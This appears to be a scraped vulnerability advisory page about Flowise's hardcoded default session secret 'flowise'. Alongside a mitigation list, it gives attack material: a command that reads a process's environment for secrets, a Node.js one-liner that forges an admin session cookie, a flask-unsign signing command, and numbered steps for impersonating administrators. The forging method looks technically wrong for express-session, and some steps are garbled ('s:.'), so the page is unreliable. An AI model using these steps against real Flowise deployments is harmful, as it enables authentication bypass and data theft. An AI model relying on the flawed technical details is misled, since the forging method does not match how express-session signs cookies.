Flowise, Weak Default Session Secret, CVE(N/A) (Critical)

Listen to this Post

The vulnerability arises because the Express.js session secret defaults to the hardcoded string ‘flowise’ when the environment variable `EXPRESS_SESSION_SECRET` is not set. This occurs in the file `packages/server/src/enterprise/middleware/passport/index.ts` at line 55, where the code reads secret: process.env.EXPRESS_SESSION_SECRET || 'flowise'. The secret is used by the `express-session` middleware to cryptographically sign session cookies, ensuring their integrity. Because ‘flowise’ is publicly visible in the source code and documentation (e.g., `.env.example` comments it out), an attacker can trivially obtain this value. Using the known secret, the attacker can forge arbitrary session cookies by crafting a session payload (e.g., a user ID or role) and computing a valid signature. The signature algorithm typically involves HMAC-SHA256. The attacker sends the forged cookie in a request to the server. The server, still using the same weak secret, validates the signature as legitimate. This allows the attacker to impersonate any user, including administrators, bypassing all authentication and authorization checks. The default is not limited to development; it remains active in production if the environment variable is omitted. No warning or error is thrown at startup. The vulnerability has high practical exploitability because the secret is known, and session cookies can be generated offline. An attacker only needs network access to the target application. The impact includes complete session hijacking, privilege escalation, and unauthorized data access.

dailycve form:

Platform: Flowise server
Version: All versions
Vulnerability: Weak default secret
Severity: Critical
date: 2026-04-16

Prediction: Patch within 30 days

What Undercode Say:

Check if EXPRESS_SESSION_SECRET is set in the running process
ps aux | grep node
Or examine the environment of the process
cat /proc/<PID>/environ | tr '\0' '\n' | grep EXPRESS_SESSION_SECRET
Forge a session cookie using the known secret 'flowise'
Example using Node.js:
node -e "const crypto = require('crypto'); const secret = 'flowise'; const sessionData = { cookie: { originalMaxAge: null, expires: null, httpOnly: true, path: '/' }, passport: { user: 'admin' } }; const sessionStr = JSON.stringify(sessionData); const sig = crypto.createHmac('sha256', secret).update(sessionStr).digest('base64').replace(/=+$/, ''); console.log('s:' + Buffer.from(sessionStr).toString('base64') + '.' + sig);"
Using Python with Flask-unsign (if available)
pip install flask-unsign
flask-unsign --sign --cookie "{'passport':{'user':'admin'}}" --secret 'flowise'

Exploit:

  1. Identify a target Flowise instance that does not set `EXPRESS_SESSION_SECRET` (e.g., default deployment).
  2. Obtain the hardcoded secret ‘flowise’ from public source code.
  3. Craft a session object that impersonates a privileged user (e.g., { passport: { user: 'admin' } }).
  4. Serialize the object (e.g., JSON) and encode as base64.
  5. Compute HMAC-SHA256 signature of the serialized string using ‘flowise’ as key, then base64 encode.

6. Combine as `s:.`.

  1. Send HTTP request with `Cookie: express:s:.` to any authenticated endpoint.

8. Server accepts forged session, granting unauthorized access.

Protection from this CVE

  • Remove the default fallback: replace `secret: process.env.EXPRESS_SESSION_SECRET || ‘flowise’` with `secret: process.env.EXPRESS_SESSION_SECRET` and add a startup check that throws an error if the variable is missing.
  • Generate a strong random secret: use `crypto.randomBytes(32).toString(‘hex’)` and store it in the environment.
  • Set `EXPRESS_SESSION_SECRET` to a high-entropy value (minimum 256 bits) in production.
  • Rotate secrets periodically and invalidate old sessions after rotation.
  • Use a secrets manager (e.g., HashiCorp Vault, AWS Secrets Manager) to inject the secret at runtime.

Impact

  • Full session hijacking: attacker can assume identity of any logged-in user without credentials.
  • Authentication bypass: all routes protected by session middleware become accessible.
  • Privilege escalation: attacker can forge admin sessions to perform arbitrary actions.
  • Data breach: read, modify, or delete sensitive data accessible to impersonated users.
  • Complete system compromise if the application has administrative capabilities.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top